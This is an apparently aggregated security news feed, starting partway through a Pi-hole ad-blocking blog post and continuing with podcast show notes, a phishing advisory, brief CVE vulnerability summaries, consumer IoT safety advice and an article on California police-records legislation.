Let's level it up because I reckon the smuttier the publication, the bigger the Pi-hole gain. Let's try these guys:

Mmm... Pi-hole...

And for comparison, when loaded with the Pi-hole in place:

Mmm... Pi-hole...

And now - (drum roll) - the network requests for each:

Mmm... Pi-hole...

Mmm... Pi-hole...

Holy shit! What - why?! I snapped the one without Pi-hole at 17.4 mins after I got sick of waiting. 2,663 requests (one of which was to Report URI, thank you very much!) and 57.6MB. To read the freakin' news. (Incidentally, in this image more than the others you can clearly see requests to domains such as fff.dailymail.co.uk failing as the Pi-hole prevents them from resolving.)

After just a few quick tests, I was pretty blown away by the speed difference. I only fired this up at about 8am this morning and I'm just 9 hours into it but already seeing some pretty cool stats:

Mmm... Pi-hole...

It's also flagging a bunch of things I'd like to look at more, for example my wife's laptop being way chattier than everything else:

Mmm... Pi-hole...

Mmm... Pi-hole...

Mmm... Pi-hole...

I haven't looked yet, but if anyone knows the purpose of that microsoft.com domain that continually get Pi-holed, leave a comment below (I assume it's related to the native Windows 10 mail client). And yes, I'll chat to her about the Fox News situation as well!

I'm yet to have any legit functionality break because of the Pi-hole, but Scott has had to whitelist a couple of domains (literally 2, from memory) such as the Google Analytics dashboard. Of course, it's entirely feasible that legit stuff will break and I myself have gone through troubleshooting pains on behalf of other people before only to then realise that it was their modification of my site that caused the failure. That's always going to be a risk and frankly, that's on me if my choice of tooling breaks something.

So in summary, no compromising devices, no putting your trust in the goodwill of an extension developer, no per-device effort, the bad stuff is blocked and the good stuff still works:

Mmm... Pi-hole...

Lastly, Pi-hole has a donate page and this is one of those cases where if you find it as awesome as I have already, you should absolutely show them some love. Cash in some of that time you've reclaimed by not waiting for rubbish ads to load 😎

SN 682: SNI Encryption

This week we look at additional changes coming from Google's Chromium team, another powerful instance of newer cross-platform malware, the publication of a 0-day exploit after Microsoft missed its deadline, the return of Sabri Haddouche with browser crash attacks, the reasoning behind Matthew Green's decision to abandon Chrome after a change in release 69... and an "UnGoogled" Chromium alternative that Matthew might approve of, Western Digital's pathetic response to a very serious vulnerability, a cool device exploit collection website, a question about the future of the Internet, a sobering example of the aftermarket in unwiped hard drives, the Mirai Botnet creators are now working with and helping the FBI, another fine levied against Equifax, and a look at Cloudflare's quick move to encrypt a remaining piece of web metadata.

We invite you to read our show notes.

Hosts: Steve Gibson and Leo Laporte

Download or subscribe to this show at https://twit.tv/shows/security-now.

You can submit a question to Security Now! at the GRC Feedback Page.

For 16kbps versions, transcripts, and notes (including fixes), visit Steve's site: grc.com, also the home of the best disk maintenance and recovery utility ever written Spinrite 6.

Sponsors:

Risky Business #515 — NSA staffer at centre of Kaspersky scandal jailed

This edition of the show features Adam Boileau and Patrick Gray discussing the week’s security news:

  • Former NSA staffer gets 66 months over incident at heart of Kaspersky scandal
  • Zoho has a very bad week
  • Telco lobby group raises some legit concerns over Australia’s “anti-encryption” legislation
  • Twitter API leaks DMs
  • Equifax fined by UK
  • Yubikey 5 enables passwordless Windows logins
  • Privacy International has an aneurism
  • NSS Labs launches antitrust suit against security software makers
  • MOAR

This week’s show is brought to you by Rapid7.

Jen Andre is this week’s sponsor guest. She was the founder of Komand, which was a security automation and orchestration company but is now a part of Rapid7 as of about mid way through last year. I spoke to Jen a bit about how she came to start Komand and where the security automation and orchestration discipline is at right now.

Links to everything that we discussed are below, including the discussions that were edited out. (That’s why there are extras.) You can follow Patrick or Adam on Twitter if that’s your thing.

Show notes

Ex-NSA employee gets 5.5 years in prison for taking home classified info | ZDNet
EDITORIAL-EAST-20180920122519
Domain registrar oversteps taking down Zoho domain, impacts over 30Mil users | ZDNet
Peter Dutton to push through new security legislation as fears of "severely damaging" spyware murmur
Twitter API bug leaked private data to other accounts
Equifax fined maximum penalty under 1998 UK data protection law
The Series 5 YubiKey Will Help Kill the Password | WIRED
Press release: UK intelligence agency admits unlawfully spying on Privacy International | Privacy International
UK spooks fess up to snooping on Privacy International's private data
GCHQ's mass surveillance violates citizens' right to privacy, ECHR rules
NSS Labs files antitrust suit against multiple cybersecurity vendors
Hacking for ca$h | The Strategist
Operator of 'VirusTotal for criminals' gets 14-year prison sentence
Tencent engineer attending cybersecurity event fined for hotel WiFi hacking
Snyk gets $22 million for platform that tracks security flaws in open source projects
They Got 'Everything': Inside a Demo of NSO Group's Powerful iPhone Malware - Motherboard
Content Moderator Sues Facebook, Says Job Gave Her PTSD - Motherboard
Microsoft Rolls Out Confidential Computing for Azure
Cloudflare Improves Privacy by Encrypting the SNI During TLS Negotiation
This Windows file may be secretly hoarding your passwords and emails | ZDNet
Security researcher claims macOS Mojave privacy bug on launch day | TechCrunch
0Day Windows JET Database Vulnerability disclosed by Zero Day Initiative
Over 80 Cisco Products Affected by FragmentSmack DoS Bug
Cisco patches 'critical' credential bug in video surveillance software
Security Orchestration and Automation with InsightConnect | Rapid7
Security Orchestration and Automation for Security Operations | Rapid7

NBlog Sept 26 – what is security architecture?


A newcomer to the ISO27k Forum asked one of those disarmingly simple or naive-sounding questions today, the kind that turn out to be fascinating once we scratch beneath the surface.

"I am currently assigned task to perform security architecture review. Can anyone help me with reference links to start off with?"


It would be inappropriate to offer suggestions and press ahead without first understanding the objectives, expectations and constraints, hence the obvious starting point (from my perspective) would be to figure out what a “security architecture review” is - more specifically, what management (or whoever assigned the task) expects from it e.g.:
  • What are its aims/purposes or drivers? 
  • Where did it spring from? What triggered it? Why now? Why you?
  • Is it business-led or IT or infosec or risk or what? Who is behind it? Who stands to benefit or be affected by it? Who are the stakeholders? Are they supportive and engaged, neutral/unaware, or reluctant and disengaged?
  • What is it expected to lead into – if anything? Is the outcome entirely open at this point, depending on what the review finds, or are there pencil marks or proposals on the table already, perhaps secret agendas looking for fuses to light?
  • What is the scope? Is it meant to be reviewing all of 'security' (whatever that means), or information security, or cybersecurity, or compliance, or strategy, or assurance, or software development security, or information flows, or something else? And why is that - what determines the scope? Why are some things in and others out of scope?
  • And, not least, what is ‘security architecture’, or indeed 'architecture', in the specific context of the organization? In some organizations, architecture is central to strategy, making it the domain of senior, experienced managers, who are unlikely to task a clueless underling to review it. To others, it's about blueprints (literally) showing plan and elevation views, and Crime Prevention Through Environmental Design.
These are not facetious or trivial questions: to my mind, there are lots of possibilities which affect the review substantially - such as its priorities, depth, scope, timescale, assurance and so on. It's basic navigation really:

Before plotting the route, where are we
on the map ... oh and where are we heading? 

For example, a "gap analysis" comparison of the organization’s information risk and security management practices against the recommendations in ISO/IEC27001 and 27002, is one possible approach. But that may not be what the organization is expecting from its "security architecture review" ... and that's not the only interpretation of "gap analysis"!

Another possible approach would be a strategic/high-level review of the organization’s information risk management practices and/or its suite of information security controls, with a strong emphasis on how things are or should develop over the next few years. Are there suitable foundations on which to build a solid ISMS with all the appropriate controls and other risk treatments in place? If not, what are the gaps and how might they be filled-in? Are there, for example, any other business, change, IT or other strategic initiatives on the horizon that might be opportunities to deliver substantial parts of the ISMS, with strong business backing and hopefully the funding to suit?

Yet another possibility is an audit/review of the organization’s current ‘security architecture’, a chance to determine how effective it is and has been, historically, forming the basis for revision, renewed emphasis or simply endorsement going forward. Is the organization poised to align its security arrangements with business objectives, technology trajectories and so forth? 

Those are substantially different approaches, just for starters, based on the forum question. We're some way from answering it at this point!

Netflix Users: Don’t Get Hooked by This Tricky Phishing Email

If you own a smart TV, or even just a computer, it’s likely you have a Netflix account. The streaming service is huge these days – even taking home awards for its owned content. So, it’s only natural cybercriminals are attempting to leverage the service’s popularity for their own gain. In fact, just discovered last week, fake Netflix emails have been circulating claiming there are issues with users’ accounts. But of course, there is no issue at all – only a phishing scam underway.

The headline in itself should be the first indicator of fraud, as it reads “Update your payment information!” The body of the fake email then claims that there’s an issue with a user’s account or that their account has been suspended. The email states that they need to update their account details in order to resolve the problem, but the link actually leads victims to a genuine-looking Netflix website designed to steal usernames and passwords, as well as payment details. If the victim updates their financial information, they are actually taken to the real Netflix home page, which gives this trick a sense of legitimacy.

In short – this phishing email scheme is convincing and tricky. That means it’s crucial all Netflix users take proactive steps now to protect themselves this stealthy attack. To do just that, follow these tips:

  • Be careful what you click on. Be sure to only click on emails that you are sure came from a trusted source. If you don’t know the sender, or the email’s content doesn’t seem familiar, remain wary and avoid interacting with the message.
  • Go directly to the source. It’s a good security rule of thumb: when an email comes through requesting personal info, always go directly to the company’s website to be sure you’re working with the real deal. You should be able to check their account status on the Netflix website, and determine the legitimacy of the request from there. If there’s still anything in question, feel free to call their support line and check about the notice that way as well.
  • Place a fraud alert. If you know your financial data has been compromised by this attack, be sure to place a fraud alert on your credit so that any new or recent requests undergo scrutiny. It’s important to note that this also entitles you to extra copies of your credit report so you can check for anything sketchy. And if you find an account you did not open, make sure you report it to the police or Federal Trade Commission, as well as the creditor involved so you can put an end to the fraudulent account.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.


{
"metadata": {
"id": "8b4876aa-14b9-441d-a8b7-d62cc6a9e821",
"version": "1.0",
"ep": "ta",
"lang": "en-us",
"original-url": "https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/netflix-users-phishing-email/",
"author": "Gary Davis",
"author-page": "https://securingtomorrow.mcafee.com/author/gary-davis/",
"category": "Consumer Threat Notices",
"draft": "false",
"authordetail": "Gary Davis is Chief Consumer Security Evangelist. Through a consumer lens, he partners with internal teams to drive strategic alignment of products with the needs of the security space. Gary also provides security education to businesses and consumers by distilling complex security topics into actionable advice. Follow Gary Davis on Twitter at @garyjdavis",
"tinyimage": "https://securingtomorrow.mcafee.com/wp-content/uploads/2018/10/img_1612609358087423-cropped.jpg",
"feedimageurl": "https://securingtomorrow.mcafee.com/wp-content/uploads/2018/10/img_1612609358087423-cropped.jpg",
"pubDate": "Tue 25 Sept 2018 12:35:48 +0000"
}
}

The post Netflix Users: Don’t Get Hooked by This Tricky Phishing Email appeared first on McAfee Blogs.

CVE-2018-14634 (enterprise_linux_desktop, enterprise_linux_server, enterprise_linux_server_aus, enterprise_linux_server_eus, enterprise_linux_server_tus, enterprise_linux_workstation, linux_kernel, ubuntu_linux)

An integer overflow flaw was found in the Linux kernel's create_elf_tables() function. An unprivileged local user with access to SUID (or otherwise privileged) binary could use this flaw to escalate their privileges on the system. Kernel versions 2.6.x, 3.10.x and 4.14.x are believed to be vulnerable.

Hack Naked News #190 – September 25, 2018

This week, WordPress sites backdoored with malicious code, Google's forced sign in to Chrome raises red flags, Newegg is victimized by Magecart Malware, a Woman hijacked CCTV cameras for Trump's inauguration, Bitcoin DDoS attacks, Cybercriminals target Kodi for Malware, and a Security Researcher is fined for hacking hotel Wifi. Jason Wood joins us for expert commentary on Google Chrome's "dark pattern" of poor privacy changes, on this episode of Hack Naked News!

 

Full Show Notes: https://wiki.securityweekly.com/HNNEpisode190

 

Visit https://www.securityweekly.com/hnn for all the latest episodes!

Visit https://www.activecountermeasures/hnn to sign up for a demo or buy our AI Hunter!!

 

→Visit our website: https://www.securityweekly.com

→Follow us on Twitter: https://www.twitter.com/securityweekly

→Like us on Facebook: https://www.facebook.com/secweekly

Understanding Your Kid’s Smart Gadgets

When people think about IoT devices, many often think of those that fill their homes. Smart lights, ovens, TVs, etc. But there’s a whole other type of IoT devices that are inside the home that parents may not be as cognizant of – children’s toys. In 2018, smartwatches, smart teddy bears, and more are all in kids’ hands. And though parents are happy to purchase the next hot item for their children, they sometimes aren’t fully aware of how these devices can impact their child’s personal security. IoT has expanded to children, but it’s parents that need to understand how these toys affect their family, and what they can do to keep their children protected from an IoT-based cyberthreat.

Now, add IoT into the mix. The reason people are commonly adopting IoT devices is for one reason – convenience. And that’s the same reason these devices have gotten into children’s hands as well. They’re convenient, engaging, easy-to-use toys, some of which are even used to help educate kids.

But this adoption has changed children’s online security. Now, instead of just limiting their device usage and screen time, parents have to start thinking about the types of threats that can emerge from their child’s interaction with IoT devices. For example, smartwatches have been used to track and record kids’ physical location. And children’s data is often recorded with these devices, which means their data could be potentially leveraged for malicious reasons if a cybercriminal breaches the organization behind a specific connected product or app. The FBI has even previously cautioned that these smart toys can be compromised by hackers.

Keeping connected kids safe  

Fortunately, there are many things parents can do to keep their connected kids safe. First off, do the homework. Before buying any connected toy or device for a kid, parents should look up the manufacturer first and see if they have security top of mind. If the device has had any issues with security in the past, it’s best to avoid purchasing it. Additionally, always read the fine print. Terms and conditions should outline how and when a company accesses a kid’s data. When buying a connected device or signing them up for an online service/app, always read the terms and conditions carefully in order to remain fully aware of the extent and impact of a kid’s online presence and use of connected devices.

Mind you, these IoT toys must connect to a home Wi-Fi network in order to run. If they’re vulnerable, they could expose a family’s home network as a result. Since it can be challenging to lock down all the IoT devices in a home, utilize a solution like McAfee Secure Home Platform to provide protection at the router-level. Also, parents can keep an eye on their kid’s online interactions by leveraging a parental control solution like McAfee Safe Family. They can know what their kids are up to, guard them from harm, and limit their screen time by setting rules and time limits for apps and websites.

To learn more about IoT devices and how your children use them, be sure to follow us at @McAfee and @McAfee_Home.

The post Understanding Your Kid’s Smart Gadgets appeared first on McAfee Blogs.

Double Shot – Business Security Weekly #100

This week, Michael is joined by April Wright to interview Scott King, Sr. Director of Strategic Advisory Services at Rapid 7! In this two part interview, Michael and April talk with Scott about transitioning into his role at Rapid7, ICS Security, the best practices to understand how these systems work, holding accountability, and how legal and security share common goals!

Full Show Notes: https://wiki.securityweekly.com/BSWEpisode100

 

Visit https://www.securityweekly.com/bsw for all the latest episodes!

 

Visit https://www.activecountermeasures/bsw to sign up for a demo or buy our AI Hunter!!

 

→Visit our website: https://www.securityweekly.com

→Follow us on Twitter: https://www.twitter.com/securityweekly

→Like us on Facebook: https://www.facebook.com/secweekly

Space Elevator Test

STAR space elevator
So cool!

STARS-Me (or Space Tethered Autonomous Robotic Satellite – Mini elevator), built by engineers at Shizuoka University in Japan, is comprised of two 10-centimeter cubic satellites connected by a 10-meter-long tether. A small robot representing an elevator car, about 3 centimeters across and 6 centimeters tall, will move up and down the cable using a motor as the experiment floats in space.

Via Science News, “Japan has launched a miniature space elevator,” and “the STARS project.”

California transparency legislation could improve access to police records for journalists and the public

police
WikiMedia Commons

In November 2014, James De La Rosa was shot and killed by Bakersfield police officers. He was unarmed and 22 years old. Following his death, his family desperately wanted answers. But in California, police misconduct records are generally not available to the public—limiting what the De La Rosa family was able to learn about the officers who killed James.

“One of the officers who was involved in James’s shooting has reportedly also been involved in seven other shootings, while another officer has reportedly been involved in another killing,” James De La Rosa’s mother Leticia said in a statement to the ACLU. “Yet state law shields their records and families like mine rarely get answers to the questions we ask. All we get is secrecy.”

Like Leticia De La Rosa, Theresa Smith had a son killed by California police officers. Caesar Cruz was shot in a Walmart parking lot—allegedly multiple times—by Anaheim police officers before dying in a hospital a half hour later. An attorney for Cruz’ family called his death a “police execution.”

But all that Cruz’ family was allowed to know about her son’s death was that five officers were involved, and it took Smith over a year and a half to determine the name of the officer who killed Caesar Cruz.

While police misconduct information is public record in many states, that’s not the case in California. Even when an officer is repeatedly accused of or disciplined for abuse, these records are considered part of an officer’s personnel file.

In the 1970s, Gov. Jerry Brown signed into law a measure that blocked public access to misconduct documents, and forced defendants to petition a judge to examine these records in private and decide if the information warranted disclosure. In 2006, the California Supreme Court ruled that police misconduct investigations are confidential, a ruling that has kept answers from families of people hurt by police violence, obscured critical information about public officials from journalists, and shielded police from scrutiny.

Leticia De La Rosa and Theresa Smith are both advocates for a California bill that could make police investigation and disciplinary records available to the public in particularly egregious instances of misconduct.

“This bill would require, notwithstanding any other law, certain peace officer or custodial officer personnel records and records relating to specified incidents, complaints, and investigations involving peace officers and custodial officers to be made available for public inspection pursuant to the California Public Records Act,” reads California State Senate Bill 1421.

If SB 1421, sponsored by Sen. Nancy Skinner (D-Berkeley), becomes law, personnel records could be released to the public. Journalists would be able to more easily access information, like when officers shoot, kill, commit perjury, sexually assault, lie in an investigation, or seriously injure a citizen.

Some police labor unions have fought the bill fiercely. The California Sheriffs Association argued that the bill could jeopardize officer privacy and create a financial burden on local agencies. Los Angeles Times journalist Liam Dillon noted that the Los Angeles Police Protective League gave the maximum contribution allowable to a dozen Assembly Democrats as they considered the bill.

Despite opposition from police unions, Nikki Moore, legal counsel and legislative at California News Publishers Association, noted that the California Police Chiefs Association came on in support of the bill. “When they fire an officer and have evidence of misconduct, they can’t tell the public. They saw value in this transparency, and it’s a new perspective.”

SB 1421 has made it to the governor’s desk. It isn’t the only bill awaiting Jerry Brown’s signature that could improve access to police records. Assembly Bill 748 would require police departments to make body camera footage of most officer shootings and serious uses of force publicly available.

In a blog post, California Public Records Act attorney Anna von Herrmann wrote that the bill would open up critical access to records about egregious officer misconduct. “Given the enormous power that law enforcement agencies wield, from the power to arrest and detain individuals to the power to use lethal force, public access to this information could be a powerful tool to understanding and challenging law enforcement abuses.”

The impacts of both bills for transparency could be huge—for families like Cruz’ and De La Rosa’s, community organizers, and journalists reporting on police violence and abuse of power.

“Access to government records is a fundamental principle of democracy,” said Moore. “California, for so long, has denied access to these records, retaining complete discretion over disclosure. You have government agencies acting as editor.”

SB 1421 and AB 748 both await Governor Jerry Brown’s signature. He should sign them both.

CVE-2018-1664 (datapower_gateway)

IBM DataPower Gateway 7.1.0.0 - 7.1.0.23, 7.2.0.0 - 7.2.0.21, 7.5.0.0 - 7.5.0.16, 7.5.1.0 - 7.5.1.15, 7.5.2.0 - 7.5.2.15, and 7.6.0.0 - 7.6.0.8 as well as IBM DataPower Gateway CD 7.7.0.0 - 7.7.1.2 echoing of AMP management interface authorization headers exposes login credentials in browser cache. IBM X-Force ID: 144890.

CVE-2018-1669 (datapower_gateway)

IBM DataPower Gateway 7.1.0.0 - 7.1.0.23, 7.2.0.0 - 7.2.0.21, 7.5.0.0 - 7.5.0.16, 7.5.1.0 - 7.5.1.15, 7.5.2.0 - 7.5.2.15, and 7.6.0.0 - 7.6.0.8 as well as IBM DataPower Gateway CD 7.7.0.0 - 7.7.1.2 are vulnerable to a XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 144950.